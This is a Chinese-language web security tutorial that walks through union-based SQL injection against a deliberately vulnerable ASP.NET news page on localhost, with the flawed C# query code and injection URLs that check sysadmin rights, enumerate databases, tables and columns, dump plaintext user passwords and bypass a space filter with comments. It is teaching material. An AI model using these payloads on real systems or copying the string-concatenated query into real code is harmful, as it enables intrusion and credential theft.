接着上篇,还是新闻发布系统,上篇演示的盲注,其实还有更简单的办法。上篇是从新闻详细页面入侵成功,在下面的测试中入侵者发现新闻列表页面也存在相同的漏洞,呵呵呵,貌似从这里入侵更方便些。
这里测试环境跟上一篇相同, MSQL + asp.net 。新闻列表页面代码如下:
protected void Page_Load(object sender, EventArgs e) { try { var sql = string.Format("select * from news where categoryid ='{0}'" ,Request["cId"]); var ds = new DataSet(); var sqlCon = SqlHelper.GetConnection(); SqlHelper.FillDataset(sqlCon, CommandType.Text, sql, ds, null); ListView1.DataSource = ds.Tables[0]; ListView1.DataBind(); } catch (Exception ex) { } }
废话少说,开始吧。下面是文章列表页面地址: http://localhost:2003/index?cId=category1
1. 确认用户数据库权限
先看看当前用户的数据库服务器角色,
先普及一下,数据库服务器角色见下表:
角色 | 描述 |
---|---|
sysadmin | 执行SQL Server中的任何动作(sa 权限) |
serveradmin | 配置服务器设置 |
setupadmin | 安装复制和管理扩展过程 |
securityadmin | 管理登录和CREATE DATABASE的权限以及阅读审计 |
processadmin | 管理SQL Server进程 |
dbcreator | 创建和修改数据库 |
diskadmin | 管理磁盘文件 |
bulkadmin | 可以运行 Bulk insert 语句 |
确认用户是否具有“数据库服务器角色” 的语句为 select IS_SRVROLEMEMBER('sysadmin') 返回 0 或 1,IS_SRVROLEMEMBER 函数详细说明见: https://technet.microsoft.com/zh-cn/ms176015
如果您对数据库权限体系不了解的话请移步 http://www.cnblogs.com/CareySon/archive/2012/04/10/mssql-security-principal.html
继续,在URL中注入查看用户数据库服务器角色的语句 http://localhost:2003/index?cId=category1' and (select IS_SRVROLEMEMBER('sysadmin'))=1 --
哈哈哈,居然是 sa账号,下面就轻松了。
2. 看看新闻表查询语句返回多少字段
要执行的语句 select * from news where categoryid ='category1' order by 3
在URL里输入 http://localhost:2003/index?cId=category1' order by 3 --
页面显示正常,说明表字段至少有3个,继续尝试当输入 http://localhost:2003/index?cId=category1' order by 6 --
时页面数据丢失,说明新闻表查询语句返回5个字段。为什么要知道它返回多少字段,别急,下面我们就要用的着。
3. 查询数据库列表
MSQL 数据库都存放在 master 表里 ,查询语句 select [name] from master.dbo.sysdatabases order by [name] 因为是跨库查询 所有要使用 master.dbo.sysdatabases
那么查询出来的数据怎么做页面上显示出来呢,有办法使用 union 语句,而 union 语句 返回的字段数和类型必须跟 前面的查询语句返回字段相同,第2步工作就派上用场了,返回5个字段
而且同过 上一篇文章 WEB 安全之 SQL注入一 我们已经知道文章ID为数字类型,列表里面 标题、创建日期 的类型也很好判断,5个字段知道3个字段的字段类型了,其他2个只能试试了,暂且认为都是字符串类型吧
那么我们构造查询语句 试试 select * from news where categoryid ='category1' union select 1,[name],'2016-11-18','4','5' from master.dbo.sysdatabases
当然如果想把新闻数据去掉 (where categoryid ='category1' and 1=2 union ) 构造此查询语句需要在URL里输入
http://localhost:2003/index?cId=category1' union select 1,[name],'2016-11-18','4','5' from master.dbo.sysdatabases --
不可以,没有数据返回,估计创建日期列的位置不对,或者其他有那一个字段类型不对这里是考验入侵者耐心的地方多试几次,直到输入
http://localhost:2003/index?cId=category1' union' select' 1,[name],'3','2016-11-18','5' from master.dbo.sysdatabases --
,注意看下面的数据库列表,我的截图里只把 master 数据库显示出来,其他没截取,呵呵呵又突破一层。
4. 查询数据库里包含的表
数据库罗列出来,下面我们就要看如何查询数据库里包含的表了,查询语句 SELECT Name FROM 数据库名.架构名.SysObjects Where XType='U'
根据日常的经验,架构名 可以说 80%以上的数据库里 都是默认架构 dbo,我们就构造一条语句爆出它的表名。(假设我们第3步根据返回的数据库列表已经确认本系统的数据库名,怎么确认不在此讨论范围内,本示例数据库名为 SqlLinjection)
攻击者需要构造后的语句 select * from news where categoryid ='category1' and 1=2 union SELECT 1,Name,'3','2016-11-18','5' FROM SqlLinjection.dbo.SysObjects Where XType='U' (前面我们已经知道 新闻列表查询语句返回字段类型了)
这一步比较简单 URL输入 http://localhost:2003/index?cId=category1' and 1=2 union SELECT 1,Name,'3','2016-11-18','5' FROM SqlLinjection.dbo.SysObjects Where XType='U
可以确认 2张表 news 、user
5. 查询用户表字段
最终目标就要达成了,表字段查询语句 SELECT Name FROM SysColumns WHERE id=Object_Id('user') ,要爆出字段同样要用到万恶的 union 语句
攻击者构造如下语句 select * from news where categoryid ='category1' and 1=2 union SELECT 1,Name,'3','2016-11-18','5' FROM SysColumns WHERE id=Object_Id('user') 又是 union
攻击者在URL里面输入 http://localhost:2003/index?cId=category1' and 1=2 union SELECT 1,Name,'3','2016-11-18','5' FROM SysColumns WHERE id=Object_Id('user') --
字段都出来了,4个字段,攻击者最关心的就是 name、pwd
6. 爆密码、用户名
爆 用户名,密码 语句 select * from news where categoryid ='category1' and 1=2 union SELECT 1, Name + '<>'+pwd,'3','2016-11-18','5' FROM [user] 其中用 '<>' 分割用户名密码
URL里输入 http://localhost:2003/index?cId=category1' and 1=2 union SELECT 1, Name + '<>' + pwd,'3','2016-11-18','5' FROM [user] -- 奇怪没达到预期目的,数据显示不出来,问题出现在 + 上。
URL 会把加号转换为空格的,转义一下 用 "2B%"替换就可以了 http://localhost:2003/index?cId=category1' and 1=2 union SELECT 1, Name%2b'<>'%2bpwd,'3','2016-11-18','5' FROM [user] --
用户名密码拿到了,密码还是明文的,这是相比较盲注的另一种注入方式。
7.绕过空格限制
话说攻击者入侵后,管理员通过查看日志发现异常
小样,我把空空格给你过滤掉不就可以了吗?修改后台代码
public partial class index : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { try { var id = Request["cId"]; if (IsContainsSpaces(id)) { Response.Write("悟空,又调皮了!"); Response.End(); } var sql = string.Format("select * from news where categoryid ='{0}'" ,id); var ds = new DataSet(); var sqlCon = SqlHelper.GetConnection(); SqlHelper.FillDataset(sqlCon, CommandType.Text, sql, ds, null); ListView1.DataSource = ds.Tables[0]; ListView1.DataBind(); } catch (Exception ex) { } } private bool IsContainsSpaces(string str) { var reg = new Regex(@"[\s]+"); return reg.IsMatch(str.Trim()); } }
攻击者还有其他方法绕过去的 URL里输入 http://localhost:833/index?cId=category1'/**/and/**/1=1/**/--
呵呵呵,空格是可以用 /**/ 来代替的